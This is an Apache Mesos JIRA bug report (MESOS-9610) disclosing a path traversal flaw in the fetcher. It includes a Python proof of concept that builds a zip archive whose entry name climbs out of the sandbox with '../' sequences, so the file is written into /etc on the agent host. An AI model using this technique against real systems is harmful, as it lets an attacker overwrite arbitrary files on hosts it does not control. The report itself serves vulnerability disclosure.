Mariusz Derela created MESOS-9610:
-------------------------------------
Summary: Fetcher vulnerability - escaping from sandbox
Key: MESOS-9610
URL: https://issues.apache.org/jira/browse/MESOS-9610
Project: Mesos
Issue Type: Bug
Components: fetcher
Affects Versions: 1.7.2
Reporter: Mariusz Derela
I have noticed that there is a possibility to exploit fetcher and overwrite
any files on the agent host.
scenario to reproduce:
1) prepare a file with any content and name a file like "../../../etc/test". we
can use python and zipfile module to achieve that:
{code:java}
>>> import zipfile
>>> zip = zipfile.ZipFile("exploit.zip", "w")
>>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt",
>>> "some content")
>>> zip.close()
{code}
2) prepare a service that will use our artifact (exploit.zip)
3) run service
at the end in /etc we will get our file. As you can imagine there is a lot
possibility how we can use it.
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
